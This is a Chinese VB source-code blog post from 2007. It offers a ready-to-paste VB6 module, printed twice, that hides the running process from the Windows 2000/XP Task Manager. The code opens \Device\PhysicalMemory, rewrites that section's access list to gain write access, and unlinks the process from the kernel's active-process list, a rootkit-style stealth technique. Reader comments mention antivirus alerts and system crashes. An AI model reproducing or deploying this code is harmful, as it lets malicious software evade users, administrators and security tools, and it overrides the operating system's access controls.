在XP/2K 任务管理器的进程列表中隐藏当前进程 - 枕善居VB.NET源码博客枕善居VB.NET源码博客 
首先我为人人,其次人人为我!
  首页
  乱侃
  公告
  VB源码
  .NET源码
  工具
  贴图
  原创
  论坛
  留言
  归档
欢迎光临:
　　
　　非常感谢您光临枕善居。本站是一个免费的基于VB，VB.NET源代码交流的平台，为大家提供优质的专业的源代码，如果您有需要，本站可以帮助在业余时间里给您寻找代码。当然，如果您有好的代码也可以在本站发布，共享给大家。
专业VB和.NET源代码DVD光盘、开发编程Icon,PNG、USB电脑遥控器，点击进入--->
 M2009 USB电脑遥控器 标准微软RC6格式 MCE格式设计 无线鼠标功能!            
VB及.NET源码文档+解决方案+数据字典DVD(控件升级DVD) 


      输入您的搜索字词  提交搜索表单         
 订阅 |  上一篇 |  下一篇  VB源码 在XP/2K 任务管理器的进程列表中隐藏当前进程作者:Mndsoft 日期:2007-06-18字体大小: 小 
中 大  
新建一个模块，把以下代码复制进去，然后在load中调用即可实现隐藏当前进程的目的。

Option Explicit
'-----------------------------------------------------
'模块名称：modHideProcess.bas
'
'模块功能：在 XP/2K 任务管理器的进程列表中隐藏当前进程
'
'使用方法：直接调用 HideCurrentProcess()
'
'
'
'-----------------------------------------------------
Private Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004
Private Const STATUS_ACCESS_DENIED = &HC0000022
Private Const STATUS_INVALID_HANDLE = &HC0000008
Private Const ERROR_SUCCESS = 0&
Private Const SECTION_MAP_WRITE = &H2
Private Const SECTION_MAP_READ = &H4
Private Const READ_CONTROL = &H20000
Private Const WRITE_DAC = &H40000
Private Const NO_INHERITANCE = 0
Private Const DACL_SECURITY_INFORMATION = &H4
Private Type IO_STATUS_BLOCK
Status As Long
Information As Long
End Type
Private Type UNICODE_STRING
Length As Integer
MaximumLength As Integer
Buffer As Long
End Type
Private Const OBJ_INHERIT = &H2
Private Const OBJ_PERMANENT = &H10
Private Const OBJ_EXCLUSIVE = &H20
Private Const OBJ_CASE_INSENSITIVE = &H40
Private Const OBJ_OPENIF = &H80
Private Const OBJ_OPENLINK = &H100
Private Const OBJ_KERNEL_HANDLE = &H200
Private Const OBJ_VALID_ATTRIBUTES = &H3F2
Private Type OBJECT_ATTRIBUTES
Length As Long
RootDirectory As Long
ObjectName As Long
Attributes As Long
SecurityDeor As Long
SecurityQualityOfService As Long
End Type
Private Type ACL
AclRevision As Byte
Sbz1 As Byte
AclSize As Integer
AceCount As Integer
Sbz2 As Integer
End Type
Private Enum ACCESS_MODE
NOT_USED_ACCESS
GRANT_ACCESS
SET_ACCESS
DENY_ACCESS
REVOKE_ACCESS
SET_AUDIT_SUCCESS
SET_AUDIT_FAILURE
End Enum
Private Enum MULTIPLE_TRUSTEE_OPERATION
NO_MULTIPLE_TRUSTEE
TRUSTEE_IS_IMPERSONATE
End Enum
Private Enum TRUSTEE_FORM
TRUSTEE_IS_SID
TRUSTEE_IS_NAME
End Enum
Private Enum TRUSTEE_TYPE
TRUSTEE_IS_UNKNOWN
TRUSTEE_IS_USER
TRUSTEE_IS_GROUP
End Enum
Private Type TRUSTEE
pMultipleTrustee As Long
MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION
TrusteeForm As TRUSTEE_FORM
TrusteeType As TRUSTEE_TYPE
ptstrName As String
End Type
Private Type EXPLICIT_ACCESS
grfAccessPermissions As Long
grfAccessMode As ACCESS_MODE
grfInheritance As Long
TRUSTEE As TRUSTEE
End Type
Private Type AceArray
List() As EXPLICIT_ACCESS
End Type
Private Enum SE_OBJECT_TYPE
SE_UNKNOWN_OBJECT_TYPE = 0
SE_FILE_OBJECT
SE_SERVICE
SE_PRINTER
SE_REGISTRY_KEY
SE_LMSHARE
SE_KERNEL_OBJECT
SE_WINDOW_OBJECT
SE_DS_OBJECT
SE_DS_OBJECT_ALL
SE_PROVIDER_DEFINED_OBJECT
SE_WMIGUID_OBJECT
End Enum
Private Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As 
Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner 
As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long
Private Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As 
Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner 
As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDeor As 
Long) As Long

Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias 
"SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, 
pListOfExplicitEntries As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) 
As Long
Private Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias 
"BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal 
pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As 
ACCESS_MODE, ByVal Inheritance As Long)

Private Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As 
UNICODE_STRING, ByVal SourceString As Long)
Private Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, 
ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long
Private Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As 
Long
Private Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject 
As Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal 
dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long
Private Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) 
As Long
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination 
As Any, Source As Any, ByVal Length As Long)
Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" 
(LpVersionInformation As OSVERSIONINFO) As Long
Private Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type

Private verinfo As OSVERSIONINFO

Private g_hNtDLL As Long
Private g_pMapPhysicalMemory As Long
Private g_hMPM As Long
Private aByte(3) As Byte
Public Sub HideCurrentProcess()
'在进程列表中隐藏当前应用程序进程
Dim thread As Long, process As Long, fw As Long, bw As Long
Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long

verinfo.dwOSVersionInfoSize = Len(verinfo)
If (GetVersionEx(verinfo)) <> 0 Then
If verinfo.dwPlatformId = 2 Then
If verinfo.dwMajorVersion = 5 Then
Select Case verinfo.dwMinorVersion
Case 0
lOffsetFlink = &HA0
lOffsetBlink = &HA4
lOffsetPID = &H9C
Case 1
lOffsetFlink = &H88
lOffsetBlink = &H8C
lOffsetPID = &H84
End Select
End If
End If
End If
If OpenPhysicalMemory <> 0 Then
thread = GetData(&HFFDFF124)
process = GetData(thread + &H44)
fw = GetData(process + lOffsetFlink)
bw = GetData(process + lOffsetBlink)
SetData fw + 4, bw
SetData bw, fw
CloseHandle g_hMPM
End If
End Sub
Private Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)
Dim pDacl As Long
Dim pNewDacl As Long
Dim pSD As Long
Dim dwRes As Long
Dim ea As EXPLICIT_ACCESS

GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, 
pDacl, 0, pSD

ea.grfAccessPermissions = SECTION_MAP_WRITE
ea.grfAccessMode = GRANT_ACCESS
ea.grfInheritance = NO_INHERITANCE
ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME
ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER
ea.TRUSTEE.ptstrName = "CURRENT_USER" & vbNullChar
SetEntriesInAcl 1, ea, pDacl, pNewDacl

SetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, 
ByVal pNewDacl, 0

CleanUp:
LocalFree pSD
LocalFree pNewDacl
End Sub
Private Function OpenPhysicalMemory() As Long
Dim Status As Long
Dim PhysmemString As UNICODE_STRING
Dim Attributes As OBJECT_ATTRIBUTES

RtlInitUnicodeString PhysmemString, StrPtr("\Device\PhysicalMemory")
Attributes.Length = Len(Attributes)
Attributes.RootDirectory = 0
Attributes.ObjectName = VarPtr(PhysmemString)
Attributes.Attributes = 0
Attributes.SecurityDeor = 0
Attributes.SecurityQualityOfService = 0

Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, 
Attributes)
If Status = STATUS_ACCESS_DENIED Then
Status = ZwOpenSection(g_hMPM, READ_CONTROL or WRITE_DAC, Attributes)
SetPhyscialMemorySectionCanBeWrited g_hMPM
CloseHandle g_hMPM
Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, 
Attributes)
End If

Dim lDirectoty As Long
verinfo.dwOSVersionInfoSize = Len(verinfo)
If (GetVersionEx(verinfo)) <> 0 Then
If verinfo.dwPlatformId = 2 Then
If verinfo.dwMajorVersion = 5 Then
Select Case verinfo.dwMinorVersion
Case 0
lDirectoty = &H30000
Case 1
lDirectoty = &H39000
End Select
End If
End If
End If

If Status = 0 Then
g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, 4, 0, lDirectoty, &H1000)
If g_pMapPhysicalMemory <> 0 Then OpenPhysicalMemory = g_hMPM
End If
End Function
Private Function LinearToPhys(BaseAddress As Long, addr As Long) As Long
Dim VAddr As Long, PGDE As Long, PTE As Long, PAddr As Long
Dim lTemp As Long

VAddr = addr
CopyMemory aByte(0), VAddr, 4
lTemp = Fix(ByteArrToLong(aByte) / (2 ^ 22))

PGDE = BaseAddress + lTemp * 4
CopyMemory PGDE, ByVal PGDE, 4

If (PGDE And 1) <> 0 Then
lTemp = PGDE And &H80
If lTemp <> 0 Then
PAddr = (PGDE And &HFFC00000) + (VAddr And &H3FFFFF)
Else
PGDE = MapViewOfFile(g_hMPM, 4, 0, PGDE And &HFFFFF000, &H1000)
lTemp = (VAddr And &H3FF000) / (2 ^ 12)
PTE = PGDE + lTemp * 4
CopyMemory PTE, ByVal PTE, 4

If (PTE And 1) <> 0 Then
PAddr = (PTE And &HFFFFF000) + (VAddr And &HFFF)
UnmapViewOfFile PGDE
End If
End If
End If

LinearToPhys = PAddr
End Function
Private Function GetData(addr As Long) As Long
Dim phys As Long, tmp As Long, ret As Long

phys = LinearToPhys(g_pMapPhysicalMemory, addr)
tmp = MapViewOfFile(g_hMPM, 4, 0, phys And &HFFFFF000, &H1000)
If tmp <> 0 Then
ret = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4
CopyMemory ret, ByVal ret, 4

UnmapViewOfFile tmp
GetData = ret
End If
End Function
Private Function SetData(ByVal addr As Long, ByVal data As Long) As Boolean
Dim phys As Long, tmp As Long, x As Long

phys = LinearToPhys(g_pMapPhysicalMemory, addr)
tmp = MapViewOfFile(g_hMPM, SECTION_MAP_WRITE, 0, phys And &HFFFFF000, &H1000)
If tmp <> 0 Then
x = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4
CopyMemory ByVal x, data, 4

UnmapViewOfFile tmp
SetData = True
End If
End Function
Private Function ByteArrToLong(inByte() As Byte) As Double
Dim I As Integer
For I = 0 To 3
ByteArrToLong = ByteArrToLong + inByte(I) * (&H100 ^ I)
Next I
End Function


 程序代码
新建一个模块，把以下代码复制进去，然后在load中调用即可实现隐藏当前进程的目的。

Option Explicit
[color=#ff00ff]'-----------------------------------------------------
'模块名称：modHideProcess.bas
'
'模块功能：在 XP/2K 任务管理器的进程列表中隐藏当前进程
'
'使用方法：直接调用 HideCurrentProcess()
'
'
'
'-----------------------------------------------------
Private Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004
Private Const STATUS_ACCESS_DENIED = &HC0000022
Private Const STATUS_INVALID_HANDLE = &HC0000008
Private Const ERROR_SUCCESS = 0&
Private Const SECTION_MAP_WRITE = &H2
Private Const SECTION_MAP_READ = &H4
Private Const READ_CONTROL = &H20000
Private Const WRITE_DAC = &H40000
Private Const NO_INHERITANCE = 0
Private Const DACL_SECURITY_INFORMATION = &H4
Private Type IO_STATUS_BLOCK
Status As Long
Information As Long
End Type
Private Type UNICODE_STRING
Length As Integer
MaximumLength As Integer
Buffer As Long
End Type
Private Const OBJ_INHERIT = &H2
Private Const OBJ_PERMANENT = &H10
Private Const OBJ_EXCLUSIVE = &H20
Private Const OBJ_CASE_INSENSITIVE = &H40
Private Const OBJ_OPENIF = &H80
Private Const OBJ_OPENLINK = &H100
Private Const OBJ_KERNEL_HANDLE = &H200
Private Const OBJ_VALID_ATTRIBUTES = &H3F2
Private Type OBJECT_ATTRIBUTES
Length As Long
RootDirectory As Long
ObjectName As Long
Attributes As Long
SecurityDeor As Long
SecurityQualityOfService As Long
End Type
Private Type ACL
AclRevision As Byte
Sbz1 As Byte
AclSize As Integer
AceCount As Integer
Sbz2 As Integer
End Type
Private Enum ACCESS_MODE
NOT_USED_ACCESS
GRANT_ACCESS
SET_ACCESS
DENY_ACCESS
REVOKE_ACCESS
SET_AUDIT_SUCCESS
SET_AUDIT_FAILURE
End Enum
Private Enum MULTIPLE_TRUSTEE_OPERATION
NO_MULTIPLE_TRUSTEE
TRUSTEE_IS_IMPERSONATE
End Enum
Private Enum TRUSTEE_FORM
TRUSTEE_IS_SID
TRUSTEE_IS_NAME
End Enum
Private Enum TRUSTEE_TYPE
TRUSTEE_IS_UNKNOWN
TRUSTEE_IS_USER
TRUSTEE_IS_GROUP
End Enum
Private Type TRUSTEE
pMultipleTrustee As Long
MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION
TrusteeForm As TRUSTEE_FORM
TrusteeType As TRUSTEE_TYPE
ptstrName As String
End Type
Private Type EXPLICIT_ACCESS
grfAccessPermissions As Long
grfAccessMode As ACCESS_MODE
grfInheritance As Long
TRUSTEE As TRUSTEE
End Type
Private Type AceArray
List() As EXPLICIT_ACCESS
End Type
Private Enum SE_OBJECT_TYPE
SE_UNKNOWN_OBJECT_TYPE = 0
SE_FILE_OBJECT
SE_SERVICE
SE_PRINTER
SE_REGISTRY_KEY
SE_LMSHARE
SE_KERNEL_OBJECT
SE_WINDOW_OBJECT
SE_DS_OBJECT
SE_DS_OBJECT_ALL
SE_PROVIDER_DEFINED_OBJECT
SE_WMIGUID_OBJECT
End Enum
Private Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As 
Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner 
As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long
Private Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As 
Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner 
As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDeor As 
Long) As Long

Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias 
"SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, 
pListOfExplicitEntries As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) 
As Long
Private Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias 
"BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal 
pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As 
ACCESS_MODE, ByVal Inheritance As Long)

Private Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As 
UNICODE_STRING, ByVal SourceString As Long)
Private Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, 
ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long
Private Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As 
Long
Private Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject 
As Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal 
dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long
Private Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) 
As Long
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination 
As Any, Source As Any, ByVal Length As Long)
Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" 
(LpVersionInformation As OSVERSIONINFO) As Long
Private Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type

Private verinfo As OSVERSIONINFO

Private g_hNtDLL As Long
Private g_pMapPhysicalMemory As Long
Private g_hMPM As Long
Private aByte(3) As Byte
Public Sub HideCurrentProcess()
'在进程列表中隐藏当前应用程序进程
Dim thread As Long, process As Long, fw As Long, bw As Long
Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long

verinfo.dwOSVersionInfoSize = Len(verinfo)
If (GetVersionEx(verinfo)) <> 0 Then
If verinfo.dwPlatformId = 2 Then
If verinfo.dwMajorVersion = 5 Then
Select Case verinfo.dwMinorVersion
Case 0
lOffsetFlink = &HA0
lOffsetBlink = &HA4
lOffsetPID = &H9C
Case 1
lOffsetFlink = &H88
lOffsetBlink = &H8C
lOffsetPID = &H84
End Select
End If
End If
End If
If OpenPhysicalMemory <> 0 Then
thread = GetData(&HFFDFF124)
process = GetData(thread + &H44)
fw = GetData(process + lOffsetFlink)
bw = GetData(process + lOffsetBlink)
SetData fw + 4, bw
SetData bw, fw
CloseHandle g_hMPM
End If
End Sub
Private Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)
Dim pDacl As Long
Dim pNewDacl As Long
Dim pSD As Long
Dim dwRes As Long
Dim ea As EXPLICIT_ACCESS

GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, 
pDacl, 0, pSD

ea.grfAccessPermissions = SECTION_MAP_WRITE
ea.grfAccessMode = GRANT_ACCESS
ea.grfInheritance = NO_INHERITANCE
ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME
ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER
ea.TRUSTEE.ptstrName = "CURRENT_USER" & vbNullChar
SetEntriesInAcl 1, ea, pDacl, pNewDacl

SetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, 
ByVal pNewDacl, 0

CleanUp:
LocalFree pSD
LocalFree pNewDacl
End Sub
Private Function OpenPhysicalMemory() As Long
Dim Status As Long
Dim PhysmemString As UNICODE_STRING
Dim Attributes As OBJECT_ATTRIBUTES

RtlInitUnicodeString PhysmemString, StrPtr("\Device\PhysicalMemory")
Attributes.Length = Len(Attributes)
Attributes.RootDirectory = 0
Attributes.ObjectName = VarPtr(PhysmemString)
Attributes.Attributes = 0
Attributes.SecurityDeor = 0
Attributes.SecurityQualityOfService = 0

Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, 
Attributes)
If Status = STATUS_ACCESS_DENIED Then
Status = ZwOpenSection(g_hMPM, READ_CONTROL or WRITE_DAC, Attributes)
SetPhyscialMemorySectionCanBeWrited g_hMPM
CloseHandle g_hMPM
Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, 
Attributes)
End If

Dim lDirectoty As Long
verinfo.dwOSVersionInfoSize = Len(verinfo)
If (GetVersionEx(verinfo)) <> 0 Then
If verinfo.dwPlatformId = 2 Then
If verinfo.dwMajorVersion = 5 Then
Select Case verinfo.dwMinorVersion
Case 0
lDirectoty = &H30000
Case 1
lDirectoty = &H39000
End Select
End If
End If
End If

If Status = 0 Then
g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, 4, 0, lDirectoty, &H1000)
If g_pMapPhysicalMemory <> 0 Then OpenPhysicalMemory = g_hMPM
End If
End Function
Private Function LinearToPhys(BaseAddress As Long, addr As Long) As Long
Dim VAddr As Long, PGDE As Long, PTE As Long, PAddr As Long
Dim lTemp As Long

VAddr = addr
CopyMemory aByte(0), VAddr, 4
lTemp = Fix(ByteArrToLong(aByte) / (2 ^ 22))

PGDE = BaseAddress + lTemp * 4
CopyMemory PGDE, ByVal PGDE, 4

If (PGDE And 1) <> 0 Then
lTemp = PGDE And &H80
If lTemp <> 0 Then
PAddr = (PGDE And &HFFC00000) + (VAddr And &H3FFFFF)
Else
PGDE = MapViewOfFile(g_hMPM, 4, 0, PGDE And &HFFFFF000, &H1000)
lTemp = (VAddr And &H3FF000) / (2 ^ 12)
PTE = PGDE + lTemp * 4
CopyMemory PTE, ByVal PTE, 4

If (PTE And 1) <> 0 Then
PAddr = (PTE And &HFFFFF000) + (VAddr And &HFFF)
UnmapViewOfFile PGDE
End If
End If
End If

LinearToPhys = PAddr
End Function
Private Function GetData(addr As Long) As Long
Dim phys As Long, tmp As Long, ret As Long

phys = LinearToPhys(g_pMapPhysicalMemory, addr)
tmp = MapViewOfFile(g_hMPM, 4, 0, phys And &HFFFFF000, &H1000)
If tmp <> 0 Then
ret = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4
CopyMemory ret, ByVal ret, 4

UnmapViewOfFile tmp
GetData = ret
End If
End Function
Private Function SetData(ByVal addr As Long, ByVal data As Long) As Boolean
Dim phys As Long, tmp As Long, x As Long

phys = LinearToPhys(g_pMapPhysicalMemory, addr)
tmp = MapViewOfFile(g_hMPM, SECTION_MAP_WRITE, 0, phys And &HFFFFF000, &H1000)
If tmp <> 0 Then
x = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4
CopyMemory ByVal x, data, 4

UnmapViewOfFile tmp
SetData = True
End If
End Function
Private Function ByteArrToLong(inByte() As Byte) As Double
Dim I As Integer
For I = 0 To 3
ByteArrToLong = ByteArrToLong + inByte(I) * (&H100 ^ I)
Next I
End Function


[/color]



【VB和.NET专业源码+解决方案+数据字典DVD光盘(全国包快递)】  点击查看源代码清单    站外 本站        [本日志由 Mndsoft 于 
2007-08-12 07:50 AM 编辑]

文章来自: 本站原创
引用通告地址: 查看引用地址
Tags: 任务管理器任务管理器 进程进程 
相关日志:

一行代码关闭进程[5163]
vb中如何在任务管理器里面隐藏应用程序进程[6573]
在XP/2K 任务管理器的进程列表中隐藏当前进程[7121]
获取任意运行进程的内存使用信息[4758]
列取系统程序进程和使用端口及协议[4442]
LC进程管理器[4486]
进程指挥官--进程控制源代码[5204]
在任务管理器中隐藏和显示您的程序．[8504]
模仿Windows任务管理器源代码[6917]
分页: [1]
  其他日志热门日志 相关日志 最新日志 随机日志 人气日志 电脑新奇特 源码商店 
抛弃微软附带控件，打造个性控件，全部源码！[29051]
串口通信编程大全[23833]
精简版的MSDN　for VB6.0[23623]
豪华的界面控件---NiceFormControl[30068]
网友下载须知(2006-06-26)！！！！！！！！！[13591]
300多个 Vista 使用的 Ico图标[19516]
企业人事管理系统完美版[20636]
请购买本站物品的网友提供您的论坛ID,免费进入破解补丁版块[9780]
给鼠标添件防寒外套,买暖手鼠标垫送源码光盘![10309]
三千多个精美OFFICE2007图标(16x16)[22989]
超薄 免驱动 USB电脑遥控器 完美支持Windows Vista 
http://auction1.taobao.com/auction/item_detail-0db1-d33a3125adc7a851f7b8cbe75647e346.jhtml
枕善居精品源码网站：http://shop34161785.taobao.com/ 支持支付宝在线支付
评论: 21 | 引用: 0 | 查看次数: 7121 1 | 2 | 3 | >creathy [2008-07-23 11:24 PM]嗯lfdsj 
[2007-09-24 11:26 AM]使用方法：直接调用 HideCurrentProcess()
我是新手，这东西，怎么直接调用啊，能不能说直接些啊。试了多次，均不成功。 kx25 [2007-09-12 00:43 
AM]不敢用－－－－－－－－用过类似的代码，结果explorer.exe被关闭，无法再启动，任务管理器和其它程序出现异常错误。。。。。。。。最后只得强行重启sadamu9527 
[2007-08-28 01:09 PM]在任务栏管理器的应用程序中还是显示程序的，不过在进程里确实没有了。2.81 [2007-08-26 10:33 
PM]Greatsadamu9527 [2007-08-25 11:37 PM]哈哈，VB简直太强了。ipdk [2007-07-18 03:45 PM] 
引用来自 Mndsoft
你还相信卡巴？! 




卡巴报说有隐藏对象，挺准的啊Mndsoft [2007-07-18 01:44 PM]你还相信卡巴？! 

 引用来自 ipdk
卡巴警报说有病毒ipdk [2007-07-18 12:53 AM]卡巴警报说有病毒zzyong00 [2007-07-12 09:07 
AM]真是太强了，xpsp2 no problem1 | 2 | 3 | >发表评论昵　称:
      内　容:








      选　项:禁止表情转换 禁止自动转换链接 禁止自动转换关键字 
         
      字数限制 1000 字 | UBB代码 开启 | [img]标签 关闭 





控制面板yxxxxxxx，欢迎您!
您的权限: 普通会员


修改资料退出系統相关日志-加强版
最新日志Visual Studio 2..电信大客户查询系统 Ver 
1..媲美微软画图的画图源代码彩色图形复选框(CheckBo..1600多个精美编程开发用PN..JCButton按钮控件(完美..多文档选项卡控件示例(jcMD..笔记本电池监控器 
Ver 1...双曲线绘图控件源代码堆栈计算器最新评论[smile]这个控件好用谢谢 ！这个控件是免费的吗？没啥使用限制吧？nice flowersthanks 
a loat非常感谢，我一直想找这方面的源码。谢谢了我怎么才发现这个空间呢？  真是一大损失我看还是兼容性的问题。 
VISTA是个失败的操作...太喜欢了。。哈哈你好楼主。    编译错误  请楼主改一下 
最新留言最近实在太忙了，小站都好久没有更新。这两天把PJ升...我想实现这样的结果：当你对着麦克风说话时，能实时的...居士: 
有没有一个日期&#43;时间,好...居士，麻烦您帮我找一些关于VB&#43;A...今天在淘宝上订购了一套光盘,订购名为俞红斌,请将我...我想用vb做一个能自行设置字段的打印，现在我能做的...你好!你能不能制作一个像TVKOO的播放器.下载到...来看你拉，上茶 
多坐一会 哈哈 你网站人气也不错呀...强烈要求搞个QQ群，实现在线交流啊  我想请问教一个问题... 
  在VB里面,怎么编写...日志归档枕善居VB源码博客2009年五月 [1]2009年四月 [9]2009年三月 [3]2009年二月 [3]2009年一月 
  [2]2008年十二月 [7]2008年十一月 [3]2008年十月 [2]2008年八月 [3]2008年七月 [12]2008年六月 
  [4]2008年五月 [11]2008年四月 [7]2008年三月 [9]2008年二月 [4]2008年一月 [15]2007年十二月 
  [12]2007年十一月 [16]2007年十月 [12]2007年九月 [22]2007年八月 [22]2007年七月 [18]2007年六月 
  [18]2007年五月 [41]2007年四月 [28]2007年二月 [12]2007年一月 [17]2006年十二月 [31]2006年十一月 
  [23]2006年十月 [23]2006年九月 [17]2006年八月 [8]2006年七月 [20]2006年六月 [28]2006年五月 
  [29]2006年四月 [46]2006年三月 [20]2006年二月 [31]2006年一月 [20]2005年十二月 [19]2005年九月 
  [9]2005年八月 [34]2005年七月 [42]2005年六月 [67]2005年五月 [106]2005年四月 [92]2005年三月 
  [96]2005年二月 [25]2005年一月 [25]
技术支持      
本站Logo本站中文名称:
枕善居VB源码博客
链接地址:
http://www.mndsoft.com
描述:枕善居一个专业发布VB源代码的博客,有问必答，帮助大伙学习的站点。尤其是初学者要去的地方，当然，老鸟也能从那里挖到宝藏:) 
LOGO:
 
Powered By PJBlog2 v2.6 build 03 CopyRight 2005, 枕善居VB.NET源码博客 xhtml | css
Processed in 0.769531 second(s) , 5 queries , Ilive Design By waeko 
浙ICP备05018754号 
站长统计 | 今日IP[215] | 今日PV[3338] | 昨日IP[811] | 昨日PV[24770] | 当前在线[11]  